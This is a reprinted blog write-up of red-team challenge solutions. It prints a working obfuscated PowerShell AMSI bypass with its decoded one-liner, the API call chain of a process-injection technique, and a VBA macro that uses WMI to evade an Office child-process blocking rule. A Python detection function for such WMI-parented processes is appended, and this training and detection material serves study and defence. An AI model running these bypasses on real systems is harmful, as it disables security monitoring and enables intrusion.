PICUS RED TEAM: Partial Write-up (PICUS RED TEAM部分题解)

admin · 2021-05-29 04:16:15 · 54 views · 3044 characters · about 10 minutes to read

Well, nobody discussed their approaches in the comments under the challenges I posted yesterday, so I'll do it myself. For reasons of time only some of the solutions are covered here; if there is interest I will put together a complete write-up later.


Question 3: What is the purpose of the obfuscated PowerShell script below? Give some details about how it works.


The script is as follows:


[Delegate]::CreateDelegate(("Func``3[String,$(([String].Assembly.GetType('System.Reflection.BindingFlags')).FullName),System.Reflection.FieldInfo]" -as [String].Assembly.GetType('System.Type')),[Object]([Ref].Assembly.GetType($([cHar]([ByTE]0x53)+[cHaR]([BytE]0x79)+[cHar](11730/102)+[cHAr](31+85)+[CHaR]([BYTe]0x65)+[cHAr](101+8)+[ChAr]([byte]0x2E)+[cHaR]([byte]0x4D)+[CHAR]([bytE]0x61)+[CHar]([bYTe]0x6E)+[Char]([bYTE]0x61)+[ChaR]([Byte]0x67)+[ChAR]([bYte]0x65)+[cHAR]([bytE]0x6D)+[char](152-51)+[Char]([bYtE]0x6E)+[cHaR]([BYTe]0x74)+[char](1150/25)+[CHaR](65)+[CHAr](114+3)+[ChAr](25+91)+[cHar]([ByTe]0x6F)+[CHar]([bYTE]0x6D)+[CHAr]([BytE]0x61)+[chaR]([bYte]0x74)+[cHar](105)+[cHar](4329/39)+[cHAr]([bYTe]0x6E)+[cHAr](966/21)+[CHaR]([BytE]0x41)+[cHar]([BYTe]0x6D)+[cHAr]([ByTE]0x73)+[cHAr]([bYTE]0x69)+[Char]([BytE]0x55)+[chAr]([bytE]0x74)+[cHar](5355/51)+[CHar]([BytE]0x6C)+[CHaR](195-80)))),('GetField')).Invoke(''+$([SysTEm.NET.WEbUtILITy]::HtMLDEcodE('amsi'))+'InitFailed',(('NonPublic,Static') -as[String].Assembly.GetType('System.Reflection.BindingFlags'))).SetValue($null,$True);

This is actually the easiest of the questions. Start by pulling out the last part of the script:


([SysTEm.NET.WEbUtILITy]::HtMLDEcodE('amsi'))+'InitFailed'


Run it and look at the result:


[Screenshot: output of running the expression above]


Seeing this, some readers can already guess what the script does: it is an AMSI bypass. The middle section uses a large number of [char] and [byte] casts to hide the real call; decoding it gives:


[Screenshot: the decoded type name]


Long-time followers of this account will know what this is for, because we have posted a similar demo before:


[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)


I won't go into the details here; if you are interested, see this article: https://www.unma.sk/posts/amsi-bypass/ or the team's earlier DEF CON talk: https://www.bilibili.com/video/BV12f4y1Q7Vm?p=5


Question 7: Process Doppelganging is a well-known process injection technique used by various malware. However, it can be easily detected by Windows Defender (and other AVs) since it is an old technique. Please validate Herpaderping, a newer technique which is similar to Process Doppelganging, by compiling and executing the PoC code.


This is a particular kind of process injection technique; the API call chain is as follows:

CreateTransaction –> CreateFileTransacted –> WriteFile –> CreateSection –> NtCreateProcessEx –> RtlCreateProcessParametersEx –> VirtualAllocEx –> WriteProcessMemory –> NtCreateThreadEx



The code is available at: https://github.com/hasherezade/process_doppelganging


Question 9: As an attacker, you are targeting an environment in which creation of a child process from Office applications is blocked or heavily monitored by defenders. Please provide a method for code execution on the target system by using a macro document.


Put plainly, this is an ASR bypass. The ASR rule with ID

D4F940AB-401B-4EFC-AADC-AD5F3C50688A

is described as: Block all Office applications from creating child processes


Essentially it comes down to getting around this rule. For example, a simple macro that launches cmd:


Sub Auto_Open()
    CreateObject("WScript.Shell").Run "cmd.exe", 0
End Sub



[Screenshot: result of running this macro]


Replace the code with the following:


Function WmiExec(targetPath)
    ' targetPath: command line to run; intProcessID receives the PID of the new process
    Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
    Set objStartup = objWMIService.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    Set objProcess = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
    WmiExec = objProcess.Create(targetPath, Null, objConfig, intProcessID)
End Function


The parent process then becomes:


[Screenshot: parent process of the spawned cmd.exe]


Bypass successful.
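From the defender's side the screenshot is the whole point: a process created through Win32_Process.Create is parented by the WMI provider host WmiPrvSE.exe, so the Office parent never appears in the process tree and a rule that only inspects direct Office children does not see it. The following Python function is an added example written for this write-up, not code from the post, that runs two lineage rules over constructed process-creation records shaped like Sysmon event ID 1 (process creation): the first mirrors what the ASR rule itself blocks, the second catches an interpreter started by WmiPrvSE.exe shortly after an Office application started. The field names, the Office and interpreter lists, the sample events and the five-minute window are all assumptions.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta

# Assumed lists (not from the post): Office images whose direct children the ASR rule
# D4F940AB-401B-4EFC-AADC-AD5F3C50688A blocks, the WMI provider host, and interpreters
# that rarely have a legitimate reason to be started by WmiPrvSE.exe on a workstation.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
WMI_HOST = "wmiprvse.exe"
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                       "mshta.exe", "rundll32.exe", "regsvr32.exe"}


@dataclass(frozen=True)
class ProcEvent:
    """Constructed subset of a process-creation record (e.g. Sysmon event ID 1)."""
    time: datetime
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    command_line: str


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def flag_office_lineage(events, window_seconds=300):
    """Return (rule, event) pairs in time order.

    'office-direct-child': an Office process is the direct parent (what the ASR rule blocks).
    'office-via-wmi': WmiPrvSE.exe starts an interpreter within window_seconds after an
    Office process started; WMI-created processes are parented by WmiPrvSE.exe, so the
    Office parent is absent from the tree and has to be inferred from timing.
    """
    window = timedelta(seconds=window_seconds)
    findings = []
    office_starts = []
    for event in sorted(events, key=lambda e: e.time):
        child, parent = _basename(event.image), _basename(event.parent_image)
        if child in OFFICE_APPS:
            office_starts.append(event.time)
        if parent in OFFICE_APPS:
            findings.append(("office-direct-child", event))
        elif parent == WMI_HOST and child in SUSPICIOUS_CHILDREN:
            recent_office = any(timedelta(0) <= event.time - t <= window for t in office_starts)
            if recent_office:
                findings.append(("office-via-wmi", event))
    return findings


# Constructed sample telemetry, not real logs.
T0 = datetime(2021, 5, 28, 10, 0, 0)
OFFICE = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
WMIPRVSE = r"C:\Windows\System32\wbem\WmiPrvSE.exe"
SAMPLE_EVENTS = [
    ProcEvent(T0, OFFICE, r"C:\Windows\explorer.exe", '"WINWORD.EXE" invoice.docm'),
    # direct child: what the ASR rule would have blocked
    ProcEvent(T0 + timedelta(seconds=5), r"C:\Windows\System32\cmd.exe", OFFICE, "cmd.exe"),
    ProcEvent(T0 + timedelta(seconds=40), WMIPRVSE, r"C:\Windows\System32\svchost.exe", "wmiprvse.exe"),
    # the WMI-created child: parent is WmiPrvSE.exe, not WINWORD.EXE
    ProcEvent(T0 + timedelta(seconds=41), r"C:\Windows\System32\cmd.exe", WMIPRVSE, "cmd.exe"),
    ProcEvent(T0 + timedelta(seconds=50), r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe", "notepad.exe"),
    # same shape two hours later, outside the default window: not correlated with Office
    ProcEvent(T0 + timedelta(hours=2), r"C:\Windows\System32\cmd.exe", WMIPRVSE, "cmd.exe"),
]

if __name__ == "__main__":
    for rule, event in flag_office_lineage(SAMPLE_EVENTS):
        print(f"{event.time:%H:%M:%S} {rule:20} {event.parent_image} -> {event.command_line}")
```

The timing correlation is deliberately coarse and will be noisy on hosts where Office runs all day; it is a hunting query, not a blocking rule. The stronger signal is a telemetry source that records which client process issued the WMI call (WMI activity tracing, or an EDR that hooks the WMI client), because that restores the WINWORD.EXE link that the process tree loses.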


This article was first published on the WeChat public account 鸿鹄实验室: PICUS RED TEAM部分题解

Reprinted by CN-SEC中文网 (with thanks to the original author); source link: https://cn-sec.com/archives/293396.html